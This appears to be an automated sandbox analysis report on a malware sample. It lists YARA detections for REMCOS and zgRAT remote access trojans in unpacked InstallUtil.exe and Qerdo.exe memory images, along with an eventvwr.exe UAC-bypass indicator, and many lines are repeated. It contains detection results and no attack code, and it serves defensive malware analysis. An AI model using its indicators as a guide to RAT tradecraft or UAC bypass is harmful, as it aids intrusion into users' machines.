Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 17_2_0043C7AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 17_2_004338FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 17_2_004239CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 17_2_0043C9DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 17_2_00434A78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 17_2_0041BA96
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 17_2_00433DF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 17_2_00423F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 17_2_0044FF65
Source: kyFBQxVbsg.exe; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Qerdo.exe.0.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: kyFBQxVbsg.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.Qerdo.exe.5440000.4.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_zgRAT, author = ditekSHen, description = Detects zgRAT
Source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.Qerdo.exe.48f0000.4.raw.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_zgRAT, author = ditekSHen, description = Detects zgRAT
Source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.Qerdo.exe.48f0000.4.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_zgRAT, author = ditekSHen, description = Detects zgRAT
Source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
